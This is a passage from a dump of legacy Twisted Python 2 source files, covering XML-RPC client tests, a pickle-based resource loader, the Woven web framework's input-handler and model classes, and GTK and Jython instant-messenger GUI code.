d.addCallback(lambda ign: log.flushErrors(TestRuntimeError, TestValueError))
return d
class XMLRPCTestCase2(XMLRPCTestCase):
"""Test with proxy that doesn't add a slash."""
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d" % self.port)
class XMLRPCAllowNoneTestCase(unittest.TestCase):
"""
Test with allowNone set to True.
These are not meant to be exhaustive serialization tests, since
L{xmlrpclib} does all of the actual serialization work. They are just
meant to exercise a few codepaths to make sure we are calling into
xmlrpclib correctly.
"""
def setUp(self):
self.p = reactor.listenTCP(
0, server.Site(Test(allowNone=True)), interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d" % (self.port,), allowNone=True)
def test_deferredNone(self):
"""
Test that passing C{None} as an argument to a remote method and
returning a L{Deferred} which fires with C{None} properly passes the
C{None} (serialized as C{<nil/>}) over the network if allowNone is set to True.
"""
d = self.proxy().callRemote('defer', None)
d.addCallback(self.assertEquals, None)
return d
def test_dictWithNoneValue(self):
"""
Test that returning a C{dict} with C{None} as a value works properly.
"""
d = self.proxy().callRemote('defer', {'a': None})
d.addCallback(self.assertEquals, {'a': None})
return d
class XMLRPCTestAuthenticated(XMLRPCTestCase):
"""
Test with authenticated proxy. We run this with the same input/output as
above.
"""
user = "username"
password = "<PASSWORD>"
def setUp(self):
self.p = reactor.listenTCP(0, server.Site(TestAuthHeader()),
interface="127.0.0.1")
self.port = self.p.getHost().port
def testAuthInfoInURL(self):
p = xmlrpc.Proxy("http://%s:%[email protected]:%d/" % (self.user, self.password, self.port))
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
def testExplicitAuthInfo(self):
p = xmlrpc.Proxy("http://127.0.0.1:%d/" % (self.port,), self.user, self.password)
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
def testExplicitAuthInfoOverride(self):
p = xmlrpc.Proxy("http://wrong:[email protected]:%d/" % (self.port,), self.user, self.password)
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
class XMLRPCTestIntrospection(XMLRPCTestCase):
def setUp(self):
xmlrpc = Test()
addIntrospection(xmlrpc)
self.p = reactor.listenTCP(0, server.Site(xmlrpc),interface="127.0.0.1")
self.port = self.p.getHost().port
def testListMethods(self):
def cbMethods(meths):
meths.sort()
self.failUnlessEqual(
meths,
['add', 'complex', 'defer', 'deferFail',
'deferFault', 'dict', 'fail', 'fault',
'pair', 'system.listMethods',
'system.methodHelp',
'system.methodSignature'])
d = self.proxy().callRemote("system.listMethods")
d.addCallback(cbMethods)
return d
def testMethodHelp(self):
inputOutputs = [
("defer", "Help for defer."),
("fail", ""),
("dict", "Help for dict.")]
dl = []
for meth, expected in inputOutputs:
d = self.proxy().callRemote("system.methodHelp", meth)
d.addCallback(self.assertEquals, expected)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
def testMethodSignature(self):
inputOutputs = [
("defer", ""),
("add", [['int', 'int', 'int'],
['double', 'double', 'double']]),
("pair", [['array', 'string', 'int']])]
dl = []
for meth, expected in inputOutputs:
d = self.proxy().callRemote("system.methodSignature", meth)
d.addCallback(self.assertEquals, expected)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
class XMLRPCClientErrorHandling(unittest.TestCase):
def setUp(self):
self.resource = static.File(__file__)
self.resource.isLeaf = True
self.port = reactor.listenTCP(0, server.Site(self.resource), interface='127.0.0.1')
def tearDown(self):
return self.port.stopListening()
def testErroneousResponse(self):
proxy = xmlrpc.Proxy("http://127.0.0.1:%d/" % (self.port.getHost().port,))
return self.assertFailure(proxy.callRemote("someMethod"), Exception)
```
#### File: twisted/web/trp.py
```python
from pickle import Unpickler
def ResourceUnpickler(path, registry = None):
fl = open(path)
result = Unpickler(fl).load()
return result
```
#### File: web/woven/input.py
```python
import os
import inspect
from twisted.internet import defer
from twisted.python import log
from twisted.python.reflect import qual
from twisted.web import domhelpers
from twisted.web.woven import template, controller, utils
__version__ = "$Revision: 1.34 $"[11:-2]
controllerFactory = controller.controllerFactory
class InputHandler(controller.Controller):
"""
An InputHandler is like a controller, but it operates on something
contained inside of C{self.model} instead of directly on C{self.model}.
For example, a Handler whose C{model} has been set to C{"foo"} will handle
C{self.model.foo}.
The handler's job is to interpret the request and:
1. Check for valid input
2. If the input is valid, update the model
3. Use any special API of the view widget to change the view (other
than what the view updates automatically from the model) e.g. in the
case of an error, tell the view to report an error to the user
4. Return a success value; by default these values are simply recorded
and the page is rendered, but these values could be used to determine
what page to display next, etc.
"""
invalidErrorText = "Error!"
setupStacks = 0
def __init__(self, model=None,
parent=None,
name=None,
check=None,
commit = None,
invalidErrorText = None,
submodel=None,
controllerStack=None):
self.controllerStack = controllerStack
controller.Controller.__init__(self, model)
self._check = check
self._commit = commit
self._errback = None
self._parent = parent
if invalidErrorText is not None:
self.invalidErrorText = invalidErrorText
if submodel is not None:
self.submodel = submodel
if name is not None:
self.inputName = name
def initialize(self):
pass
def setNode(self, node):
self.node = node
def getInput(self, request):
"""
Return the data associated with this handler from the request, if any.
"""
name = getattr(self, 'inputName', self.submodel)
input = request.args.get(name, None)
if input:
return input
def handle(self, request):
self.initialize()
data = self.getInput(request)
success = self.check(request, data)
if isinstance(success, defer.Deferred):
success.addCallback(self.dispatchCheckResult, request, data)
success.addErrback(utils.renderFailure, request)
return success
self.dispatchCheckResult(success, request, data)
def dispatchCheckResult(self, success, request, data):
if success is not None:
if success:
result = self.handleValid(request, data)
else:
result = self.handleInvalid(request, data)
if isinstance(result, defer.Deferred):
return result
def check(self, request, data):
"""
Check whether the input in the request is valid for this handler
and return a boolean indicating validity.
"""
if self._check is None:
raise NotImplementedError(qual(self.__class__)+'.check')
# self._check is probably a bound method or simple function that
# doesn't have a reference to this InputHandler; pass it
return self._check(self, request, data)
def handleValid(self, request, data):
"""
It has been determined that the input for this handler is valid;
however, that does not mean the entire form is valid.
"""
self._parent.aggregateValid(request, self, data)
def aggregateValid(self, request, inputhandler, data):
"""By default we just pass the method calls all the way up to the root
Controller. However, an intelligent InputHandler could override this
and implement a state machine that waits for all data to be collected
and then fires.
"""
self._parent.aggregateValid(request, inputhandler, data)
def handleInvalid(self, request, data):
"""
Once it has been determined that the input is invalid, we should
tell our view to report this fact to the user.
"""
self._parent.aggregateInvalid(request, self, data)
self.view.setError(request, self.invalidErrorText)
def aggregateInvalid(self, request, inputhandler, data):
"""By default we just pass this method call all the way up to the root
Controller.
"""
self._parent.aggregateInvalid(request, inputhandler, data)
def commit(self, request, node, data):
"""
It has been determined that the input for the entire form is completely
valid; it is now safe for all handlers to commit changes to the model.
"""
if self._commit is None:
data = str(data)
if data != self.view.getData():
self.model.setData(data)
self.model.notify({'request': request, self.submodel: data})
else:
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(func)
if args[1] == 'request':
self._commit(request, data)
else:
self._commit(data)
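# Illustrative sketch (assumption, not part of the original module): the check
# and commit callables handed to an InputHandler follow the calling conventions
# used above -- check(handler, request, data) returns a truth value, and commit
# is introspected so it may take (request, data) or just (data).  The names
# below are invented for this example.
def _exampleCheck(handler, request, data):
    # Accept any non-empty input.
    return data is not None and data != [""]
def _exampleCommit(request, data):
    # A real commit would update the model; here we only log the value.
    log.msg("committing %r" % (data,))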
class DefaultHandler(InputHandler):
def handle(self, request):
"""
By default, we don't do anything
"""
pass
class SingleValue(InputHandler):
def getInput(self, request):
name = getattr(self, 'inputName', self.submodel)
input = request.args.get(name, None)
if input:
return input[0]
class Anything(SingleValue):
"""
Handle anything except for None
"""
def check(self, request, data):
if data is not None:
return 1
return None
class Integer(SingleValue):
"""
Only allow a single integer
"""
def check(self, request, data):
if data is None: return None
try:
int(data)
return 1
except (TypeError, ValueError):
return 0
def handleInvalid(self, request, data):
self.invalidErrorText = "%s is not an integer. Please enter an integer." % data
SingleValue.handleInvalid(self, request, data)
class Float(SingleValue):
"""
Only allow a single float
"""
def check(self, request, data):
if data is None: return None
try:
float(data)
return 1
except (TypeError, ValueError):
return 0
def handleInvalid(self, request, data):
self.invalidErrorText = "%s is not an float. Please enter a float." % data
SingleValue.handleInvalid(self, request, data)
class List(InputHandler):
def check(self, request, data):
return None
class DictAggregator(Anything):
"""An InputHandler for a <form> tag, for triggering a function
when all of the form's individual inputs have been validated.
Also for use gathering a dict of arguments to pass to a parent's
aggregateValid if no commit function is passed.
Usage example::
<form controller="theForm" action="">
<input controller="Integer"
view="InputText" model="anInteger" />
<input controller="Anything"
view="InputText" model="aString" />
<input type="submit" />
</form>
def theCommitFunction(anInteger=None, aString=None):
'''Note how the keyword arguments match up with the leaf model
names above
'''
print "Yay", anInteger, aString
class CMyController(controller.Controller):
def wcfactory_theForm(self, request, node, m):
return input.FormAggregator(m, commit=theCommitFunction)
"""
def aggregateValid(self, request, inputhandler, data):
"""Aggregate valid input from inputhandlers below us, into a dictionary.
"""
self._valid[inputhandler] = data
def aggregateInvalid(self, request, inputhandler, data):
self._invalid[inputhandler] = data
def exit(self, request):
"""This is the node complete message
"""
if self._commit:
# Introspect the commit function to see what
# keyword arguments it takes
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(
func)
wantsRequest = len(args) > 1 and args[1] == 'request'
if self._invalid:
# whoops error!!!1
if self._errback:
self._errback(request, self._invalid)
elif self._valid:
# We've got all the input
# Gather it into a dict and call the commit function
results = {}
for item in self._valid:
results[item.model.name] = self._valid[item]
if self._commit:
if wantsRequest:
self._commit(request, **results)
else:
self._commit(**results)
else:
self._parent.aggregateValid(request, self, results)
return results
class ListAggregator(Anything):
def aggregateValid(self, request, inputhandler, data):
"""Aggregate valid input from inputhandlers below us into a
list until we have all input from controllers below us to pass
to the commit function that was passed to the constructor or
our parent's aggregateValid.
"""
if not hasattr(self, '_validList'):
self._validList = []
self._validList.append(data)
def aggregateInvalid(self, request, inputhandler, data):
if not hasattr(self, '_invalidList'):
self._invalidList = []
self._invalidList.append(data)
def exit(self, request):
if self._commit:
# Introspect the commit function to see what
#arguments it takes
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(func)
self.numArgs = len(args)
wantsRequest = args[1] == 'request'
if wantsRequest:
self.numArgs -= 1
else:
# Introspect the template to see if we still have
# controllers that will be giving us input
# aggregateValid is called before the view renders the node, so
# we can count the number of controllers below us the first time
# we are called
if not hasattr(self, 'numArgs'):
self.numArgs = len(domhelpers.findElementsWithAttributeShallow(
self.view.node, "controller"))
if self._invalidList:
self._parent.aggregateInvalid(request, self, self._invalidList)
else:
if self._commit:
if wantsRequest:
self._commit(request, *self._validList)
else:
self._commit(*self._validList)
self._parent.aggregateValid(request, self, self._validList)
def commit(self, request, node, data):
"""If we're using the ListAggregator, we don't want the list of items
to be rerendered
xxx Need to have a "node complete" message sent to the controller
so we can reset state, so controllers can be re-run or ignore input the second time
"""
pass
```
#### File: web/woven/model.py
```python
__version__ = "$Revision: 1.53 $"[11:-2]
import types
import weakref
import warnings
from zope.interface import implements
from twisted.python import components, reflect
from twisted.internet import defer
from twisted.web.woven import interfaces
class _Nothing: pass
def adaptToIModel(m, parent=None, submodel=None):
adapted = interfaces.IModel(m, None)
if adapted is None:
adapted = Wrapper(m)
adapted.parent = parent
adapted.name = submodel
return adapted
class Model:
"""
A Model which keeps track of views which are looking at it in order
to notify them when the model changes.
"""
implements(interfaces.IModel)
def __init__(self, *args, **kwargs):
if len(args):
self.original = args[0]
else:
self.original = self
self.name = ''
self.parent = None
self.views = []
self.subviews = {}
self.submodels = {}
self._getter = kwargs.get('getter')
self._setter = kwargs.get('setter')
self.cachedFor = None
self.initialize(*args, **kwargs)
def __getstate__(self):
self.views = []
self.subviews = {}
self.submodels = {}
return self.__dict__
def invalidateCache(self):
"""Invalidate the cache for this object, so the next time
getData is called, its getter method is called again.
"""
self.cachedFor = None
def initialize(self, *args, **kwargs):
"""
Hook for subclasses to initialize themselves without having to
mess with the __init__ chain.
"""
pass
def addView(self, view):
"""
Add a view for the model to keep track of.
"""
if view not in [ref() for ref in self.views]:
self.views.append(weakref.ref(view))
def addSubview(self, name, subview):
subviewList = self.subviews.get(name, [])
subviewList.append(weakref.ref(subview))
self.subviews[name] = subviewList
def removeView(self, view):
"""
Remove a view that the model no longer should keep track of.
"""
# AM: loop on a _copy_ of the list, since we're changing it!!!
for weakref in list(self.views):
ref = weakref()
if ref is view or ref is None:
self.views.remove(weakref)
def setGetter(self, getter):
self._getter = getter
def setSetter(self, setter):
self._setter = setter
def notify(self, changed=None):
"""
Notify all views that something was changed on me.
Passing a dictionary of {'attribute': 'new value'} in changed
will pass this dictionary to the view for increased performance.
If you don't want to do this, don't, and just use the traditional
MVC paradigm of querying the model for things you're interested
in.
"""
self.cachedFor = None
if changed is None: changed = {}
retVal = []
# AM: loop on a _copy_ of the list, since we're changing it!!!
for view in list(self.views):
ref = view()
if ref is not None:
retVal.append((ref, ref.modelChanged(changed)))
else:
self.views.remove(view)
for key, value in self.subviews.items():
if value.wantsAllNotifications or changed.has_key(key):
for item in list(value):
ref = item()
if ref is not None:
retVal.append((ref, ref.modelChanged(changed)))
else:
value.remove(item)
return retVal
protected_names = ['initialize', 'addView', 'addSubview', 'removeView', 'notify', 'getSubmodel', 'setSubmodel', 'getData', 'setData']
allowed_names = []
def lookupSubmodel(self, request, submodelName):
"""
Look up a full submodel name. I will split on `/' and call
L{getSubmodel} on each element in the 'path'.
Override me if you don't want 'traversing'-style lookup, but
would rather like to look up a model based on the entire model
name specified.
If you override me to return Deferreds, make sure I look up
values in a cache (created by L{setSubmodel}) before doing a
regular Deferred lookup.
XXX: Move bits of this docstring to interfaces.py
"""
if not submodelName:
return None
# Special case: If the first character is /
# Start at the bottom of the model stack
currentModel = self
if submodelName[0] == '/':
while currentModel.parent is not None:
currentModel = currentModel.parent
submodelName = submodelName[1:]
submodelList = submodelName.split('/') #[:-1]
# print "submodelList", submodelList
for element in submodelList:
if element == '.' or element == '':
continue
elif element == '..':
currentModel = currentModel.parent
else:
currentModel = currentModel.getSubmodel(request, element)
if currentModel is None:
return None
return currentModel
def submodelCheck(self, request, name):
"""Check if a submodel name is allowed. Subclass me to implement a
name security policy.
"""
if self.allowed_names:
return (name in self.allowed_names)
else:
return (name and name[0] != '_' and name not in self.protected_names)
def submodelFactory(self, request, name):
warnings.warn("Warning: default Model lookup strategy is changing:"
"use either AttributeModel or MethodModel for now.",
DeprecationWarning)
if hasattr(self, name):
return getattr(self, name)
else:
return None
def getSubmodel(self, request, name):
"""
Get the submodel `name' of this model. If I ever return a
Deferred, then I ought to check for cached values (created by
L{setSubmodel}) before doing a regular Deferred lookup.
"""
if self.submodels.has_key(name):
return self.submodels[name]
if not self.submodelCheck(request, name):
return None
m = self.submodelFactory(request, name)
if m is None:
return None
sm = adaptToIModel(m, self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
"""
Set a submodel on this model. If getSubmodel or lookupSubmodel
ever return a Deferred, I ought to set this in a place that
lookupSubmodel/getSubmodel know about, so they can use it as a
cache.
"""
if self.submodelCheck(request, name):
if self.submodels.has_key(name):
del self.submodels[name]
setattr(self, name, value)
def dataWillChange(self):
pass
def getData(self, request):
if self.cachedFor != id(request) and self._getter is not None:
self.cachedFor = id(request)
self.dataWillChange()
self.orig = self.original = self._getter(request)
return self.original
def setData(self, request, data):
if self._setter is not None:
self.cachedFor = None
return self._setter(request, data)
else:
if hasattr(self, 'parent') and self.parent:
self.parent.setSubmodel(request, self.name, data)
self.orig = self.original = data
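# Illustrative note (comments only, not part of the original module):
# lookupSubmodel walks a '/'-separated path by repeated getSubmodel calls, so a
# wrapper around nested dictionaries can be traversed like a small tree, e.g.
#
#     m = DictionaryModel({'user': {'name': 'alice'}})   # defined further below
#     nameModel = m.lookupSubmodel(None, 'user/name')
#     nameModel.getData(None)   # -> 'alice'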
class MethodModel(Model):
"""Look up submodels with wmfactory_* methods.
"""
def submodelCheck(self, request, name):
"""Allow any submodel for which I have a submodel.
"""
return hasattr(self, "wmfactory_"+name)
def submodelFactory(self, request, name):
"""Call a wmfactory_name method on this model.
"""
meth = getattr(self, "wmfactory_"+name)
return meth(request)
def getSubmodel(self, request=None, name=None):
if name is None:
warnings.warn("Warning! getSubmodel should now take the request as the first argument")
name = request
request = None
cached = self.submodels.has_key(name)
sm = Model.getSubmodel(self, request, name)
if sm is not None:
if not cached:
sm.cachedFor = id(request)
sm._getter = getattr(self, "wmfactory_"+name)
return sm
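# Illustrative sketch (assumption, comments only): a MethodModel subclass
# publishes submodels by defining wmfactory_* methods; the class and method
# names below are invented for this example.
#
#     class UserModel(MethodModel):
#         def wmfactory_name(self, request):
#             return "alice"
#
# getSubmodel(request, "name") would then call wmfactory_name and wrap the
# returned value in an IModel adapter.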
class AttributeModel(Model):
"""Look up submodels as attributes with hosts.allow/deny-style security.
"""
def submodelFactory(self, request, name):
if hasattr(self, name):
return getattr(self, name)
else:
return None
#backwards compatibility
WModel = Model
class Wrapper(Model):
"""
I'm a generic wrapper to provide limited interaction with the
Woven models and submodels.
"""
parent = None
name = None
def __init__(self, orig):
Model.__init__(self)
self.orig = self.original = orig
def dataWillChange(self):
pass
def __repr__(self):
myLongName = reflect.qual(self.__class__)
return "<%s instance at 0x%x: wrapped data: %s>" % (myLongName,
id(self), self.original)
class ListModel(Wrapper):
"""
I wrap a Python list and allow it to interact with the Woven
models and submodels.
"""
def dataWillChange(self):
self.submodels = {}
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
orig = self.original
try:
i = int(name)
except:
return None
if i >= len(orig):
return None
sm = adaptToIModel(orig[i], self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
self.original[int(name)] = value
def __len__(self):
return len(self.original)
def __getitem__(self, name):
return self.getSubmodel(None, str(name))
def __setitem__(self, name, value):
self.setSubmodel(None, str(name), value)
def __repr__(self):
myLongName = reflect.qual(self.__class__)
return "<%s instance at 0x%x: wrapped data: %s>" % (myLongName,
id(self), self.original)
class StringModel(ListModel):
""" I wrap a Python string and allow it to interact with the Woven models
and submodels. """
def setSubmodel(self, request=None, name=None, value=None):
raise ValueError("Strings are immutable.")
# pyPgSQL returns "PgResultSet" instances instead of lists, which look, act
# and breathe just like lists. pyPgSQL really shouldn't do this, but this works
try:
from pyPgSQL import PgSQL
components.registerAdapter(ListModel, PgSQL.PgResultSet, interfaces.IModel)
except:
pass
class DictionaryModel(Wrapper):
"""
I wrap a Python dictionary and allow it to interact with the Woven
models and submodels.
"""
def dataWillChange(self):
self.submodels = {}
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("getSubmodel must get a request argument now")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
orig = self.original
if name not in orig:
return None
sm = adaptToIModel(orig[name], self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
self.original[name] = value
class AttributeWrapper(Wrapper):
"""
I wrap an attribute named "name" of the given parent object.
"""
def __init__(self, parent, name):
self.original = None
parent = ObjectWrapper(parent)
Wrapper.__init__(self, parent.getSubmodel(None, name))
self.parent = parent
self.name = name
class ObjectWrapper(Wrapper):
"""
I may wrap an object and allow it to interact with the Woven models
and submodels. By default, I am not registered for use with anything.
"""
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
sm = adaptToIModel(getattr(self.original, name), self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
setattr(self.original, name, value)
class UnsafeObjectWrapper(ObjectWrapper):
"""
I may wrap an object and allow it to interact with the Woven models
and submodels. By default, I am not registered for use with anything.
I am unsafe because I allow methods to be called. In fact, I am
dangerously unsafe. Be wary or I will kill your security model!
"""
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
value = getattr(self.original, name)
if callable(value):
return value()
sm = adaptToIModel(value, self, name)
self.submodels[name] = sm
return sm
class DeferredWrapper(Wrapper):
def setData(self, request=None, data=_Nothing):
if data is _Nothing:
warnings.warn("setData should be called with request as first arg")
data = request
request = None
if isinstance(data, defer.Deferred):
self.original = data
else:
views, subviews = self.views, self.subviews
new = adaptToIModel(data, self.parent, self.name)
self.__class__ = new.__class__
self.__dict__ = new.__dict__
self.views, self.subviews = views, subviews
class Link(AttributeModel):
def __init__(self, href, text):
AttributeModel.__init__(self)
self.href = href
self.text = text
try:
components.registerAdapter(StringModel, types.StringType, interfaces.IModel)
components.registerAdapter(ListModel, types.ListType, interfaces.IModel)
components.registerAdapter(ListModel, types.TupleType, interfaces.IModel)
components.registerAdapter(DictionaryModel, types.DictionaryType, interfaces.IModel)
components.registerAdapter(DeferredWrapper, defer.Deferred, interfaces.IModel)
components.registerAdapter(DeferredWrapper, defer.DeferredList, interfaces.IModel)
except ValueError:
# The adapters were already registered
pass
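# Illustrative note (comments only): once the adapters above are registered,
# adaptToIModel() near the top of this module returns the matching wrapper for
# plain Python values, e.g. a list becomes a ListModel and a dict a
# DictionaryModel; anything without a registered adapter falls back to Wrapper.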
```
#### File: words/im/gtkcommon.py
```python
import os, re
from twisted.python import reflect
from twisted.python import util
from twisted.manhole.ui.pywidgets import isCursorOnFirstLine, isCursorOnLastLine
import string
import gtk
from libglade import GladeXML
GLADE_FILE = util.sibpath(__file__, "instancemessenger.glade")
SETTINGS_FILE = os.path.expanduser("~/.InstanceMessenger")
OFFLINE = 0
ONLINE = 1
AWAY = 2
True = gtk.TRUE
False = gtk.FALSE
class InputOutputWindow:
def __init__(self, rootName, inputName, outputName):
self.xml = openGlade(GLADE_FILE, root=rootName)
wid = self.xml.get_widget
self.entry = wid(inputName)
#self.entry.set_word_wrap(gtk.TRUE)
self.output = wid(outputName)
#self.output.set_word_wrap(gtk.TRUE)
self.widget = wid(rootName)
self.history = []
self.histpos = 0
self.linemode = True
self.currentlyVisible = 0
self.win = None
autoConnectMethods(self)
def show(self):
if not self.currentlyVisible:
self.win = w = gtk.GtkWindow(gtk.WINDOW_TOPLEVEL)
self.connectid = w.connect("destroy", self.hidden)
w.add(self.widget)
w.set_title(self.getTitle())
w.show_all()
self.entry.grab_focus()
self.currentlyVisible = 1
def hidden(self, w):
self.win = None
w.remove(self.widget)
self.currentlyVisible = 0
def hide(self):
if self.currentlyVisible:
self.win.remove(self.widget)
self.currentlyVisible = 0
self.win.disconnect(self.connectid)
self.win.destroy()
def handle_key_press_event(self, entry, event):
stopSignal = False
# ASSUMPTION: Assume Meta == mod4
isMeta = event.state & gtk.GDK.MOD4_MASK
##
# Return handling
##
if event.keyval == gtk.GDK.Return:
isShift = event.state & gtk.GDK.SHIFT_MASK
if isShift:
self.linemode = True
entry.insert_defaults('\n')
else:
stopSignal = True
text = entry.get_chars(0,-1)
if not text:
return
self.entry.delete_text(0, -1)
self.linemode = False
self.sendText(text)
self.history.append(text)
self.histpos = len(self.history)
##
# History handling
##
elif ((event.keyval == gtk.GDK.Up and isCursorOnFirstLine(entry))
or (isMeta and event.string == 'p')):
print "history up"
self.historyUp()
stopSignal = True
elif ((event.keyval == gtk.GDK.Down and isCursorOnLastLine(entry))
or (isMeta and event.string == 'n')):
print "history down"
self.historyDown()
stopSignal = True
##
# Tab Completion
##
elif event.keyval == gtk.GDK.Tab:
oldpos = entry.get_point()
word, pos = self.getCurrentWord(entry)
result = self.tabComplete(word)
#If there are multiple potential matches, then we spit
#them out and don't insert a tab, so the user can type
#a couple more characters and try completing again.
if len(result) > 1:
for nick in result:
self.output.insert_defaults(nick + " ")
self.output.insert_defaults('\n')
stopSignal = True
elif result: #only happens when len(result) == 1
entry.freeze()
entry.delete_text(*pos)
entry.set_position(pos[0])
entry.insert_defaults(result[0])
entry.set_position(oldpos+len(result[0])-len(word))
entry.thaw()
stopSignal = True
if stopSignal:
entry.emit_stop_by_name("key_press_event")
return True
def tabComplete(self, word):
"""Override me to implement tab completion for your window,
I should return a list of potential matches."""
return []
def getCurrentWord(self, entry):
i = entry.get_point()
text = entry.get_chars(0,-1)
word = re.split(r'\s', text)[-1]
start = string.rfind(text, word)
end = start+len(word)
return (word, (start, end))
def historyUp(self):
if self.histpos > 0:
self.entry.delete_text(0, -1)
self.histpos = self.histpos - 1
self.entry.insert_defaults(self.history[self.histpos])
self.entry.set_position(0)
def historyDown(self):
if self.histpos < len(self.history) - 1:
self.histpos = self.histpos + 1
self.entry.delete_text(0, -1)
self.entry.insert_defaults(self.history[self.histpos])
elif self.histpos == len(self.history) - 1:
self.histpos = self.histpos + 1
self.entry.delete_text(0, -1)
def createMethodDict(o, d=None):
if d is None:
d = {}
for base in reflect.allYourBase(o.__class__) + [o.__class__]:
for n in dir(base):
m = getattr(o, n)
#print 'd[%s] = %s' % (n, m)
d[n] = m
#print d
return d
def autoConnectMethods(*objs):
o = {}
for obj in objs:
createMethodDict(obj, o)
# print 'connecting', o
objs[0].xml.signal_autoconnect(o)
def openGlade(*args, **kwargs):
# print "opening glade file"
r = GladeXML(*args, **kwargs)
if r._o:
return r
else:
raise IOError("Couldn't open Glade XML: %s; %s" % (args, kwargs))
```
#### File: words/im/jyaccount.py
```python
from twisted.words.im.baseaccount import AccountManager
from twisted.words.im.pbsupport import PBAccount
from twisted.words.im.tocsupport import TOCAccount
from twisted.words.im.ircsupport import IRCAccount
import twisted.words.im.jychat
from java.awt import GridLayout, FlowLayout, BorderLayout, Container
import sys
from java.awt.event import ActionListener
from javax.swing import JTextField, JPasswordField, JComboBox, JPanel, JLabel,\
JCheckBox, JFrame, JButton, BoxLayout, JTable, JScrollPane, \
ListSelectionModel
from javax.swing.border import TitledBorder
from javax.swing.table import DefaultTableModel
doublebuffered = 0
stype = "twisted.words"
class NewAccountGUI:
def __init__(self, amgui):
self.amgui = amgui
self.am = amgui.acctmanager
self.buildgwinfo()
self.autologin = JCheckBox("Automatically Log In")
self.acctname = JTextField()
self.gwoptions = JPanel(doublebuffered)
self.gwoptions.border = TitledBorder("Gateway Options")
self.buildgwoptions("Twisted")
self.mainframe = JFrame("New Account Window")
self.buildpane()
def buildgwinfo(self):
self.gateways = {"Twisted" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField("twistedmatrix.com"),
"port" : JTextField("8787"),
"service" : JTextField("twisted.words"),
"persp" : JTextField()},
"AIM" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField("toc.oscar.aol.com"),
"port" : JTextField("9898")},
"IRC" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField(),
"port" : JTextField("6667"),
"channels" : JTextField()}
}
self.displayorder = { "Twisted" : [["Identity Name", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"],
["Service Name", "service"],
["Perspective Name", "persp"]],
"AIM" : [["Screen Name", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"]],
"IRC" : [["Nickname", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"],
["Channels", "channels"]]
}
def buildgwoptions(self, gw):
self.gwoptions.removeAll()
self.gwoptions.layout = GridLayout(len(self.gateways[gw]), 2)
for mapping in self.displayorder[gw]:
self.gwoptions.add(JLabel(mapping[0]))
self.gwoptions.add(self.gateways[gw][mapping[1]])
def buildpane(self):
gw = JPanel(GridLayout(1, 2), doublebuffered)
gw.add(JLabel("Gateway"))
self.gwlist = JComboBox(self.gateways.keys())#, actionPerformed=self.changegw)
self.gwlist.setSelectedItem("Twisted")
gw.add(self.gwlist)
stdoptions = JPanel(GridLayout(2, 2), doublebuffered)
stdoptions.border = TitledBorder("Standard Options")
stdoptions.add(JLabel())
stdoptions.add(self.autologin)
stdoptions.add(JLabel("Account Name"))
stdoptions.add(self.acctname)
buttons = JPanel(FlowLayout(), doublebuffered)
buttons.add(JButton("OK", actionPerformed=self.addaccount))
buttons.add(JButton("Cancel", actionPerformed=self.cancel))
mainpane = self.mainframe.getContentPane()
mainpane.layout = BoxLayout(mainpane, BoxLayout.Y_AXIS)
mainpane.add(gw)
mainpane.add(self.gwoptions)
mainpane.add(stdoptions)
mainpane.add(buttons)
def show(self):
self.mainframe.setLocation(100, 100)
self.mainframe.pack()
self.mainframe.show()
#actionlisteners
def changegw(self, ae):
self.buildgwoptions(self.gwlist.getSelectedItem())
self.mainframe.pack()
self.mainframe.show()
def addaccount(self, ae):
gwselection = self.gwlist.getSelectedItem()
gw = self.gateways[gwselection]
name = gw["ident"].text
passwd = gw["passwd"].text
host = gw["host"].text
port = int(gw["port"].text)
autologin = self.autologin.isSelected()
acctname = self.acctname.text
if gwselection == "Twisted":
sname = gw["service"].text
perspective = gw["persp"].text
self.am.addAccount(PBAccount(acctname, autologin, name, passwd,
host, port,
[[stype, sname, perspective]]))
elif gwselection == "AIM":
self.am.addAccount(TOCAccount(acctname, autologin, name, passwd,
host, port))
elif gwselection == "IRC":
channels = gw["channels"].text
self.am.addAccount(IRCAccount(acctname, autologin, name, passwd,
host, port, channels))
self.amgui.update()
print "Added new account"
self.mainframe.dispose()
def cancel(self, ae):
print "Cancelling new account creation"
self.mainframe.dispose()
class UneditableTableModel(DefaultTableModel):
def isCellEditable(self, x, y):
return 0
class AccountManagementGUI:
